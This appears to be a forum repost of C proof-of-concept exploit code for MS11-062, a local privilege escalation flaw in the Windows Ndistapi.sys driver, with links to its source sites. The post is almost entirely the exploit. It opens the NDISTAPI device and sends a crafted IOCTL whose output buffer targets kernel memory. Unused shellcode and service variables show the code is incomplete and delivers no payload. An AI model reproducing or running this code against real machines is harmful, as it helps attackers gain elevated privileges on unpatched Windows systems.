Microsoft Windows NDISTAPI Local Privilege Escalation Vulnerability (MS11-062)

[Nytro]

Microsoft Windows NDISTAPI Local Privilege Escalation Vulnerability (MS11-062)

#include "stdio.h"
#include "windows.h"

#define NTSTATUS int

int main(int argc, char* argv[])
{
PULONG  pShellcode;
char InputBuffer[4]={0};
ULONG  AllocationSize,dwReturnSize;
HANDLE dev_handle;

SC_HANDLE hscmHandle = NULL;
SC_HANDLE hscDriver = NULL;

PROCESS_INFORMATION pi;
STARTUPINFOA stStartup;

printf("\n Microsoft Ndistapi.sys Local Privilege Escalation Vulnerability Exploit \n\n");

dev_handle = CreateFile("\\\\.\\NDISTAPI" ,GENERIC_READ | GENERIC_WRITE ,0,NULL,CREATE_ALWAYS ,0,0);

DeviceIoControl( dev_handle, 0x8fff23d4, InputBuffer,4,(PVOID)0x80000000,0,&dwReturnSize, NULL);

return 1;
}

Via: http://www.softrce.net/archives/405

Sursa: http://www.ic0de.org/showthread.php?10860-SRC-Microsoft-Windows-NDISTAPI-Local-Privilege-Escalation-Vulnerability-%28MS11-062%29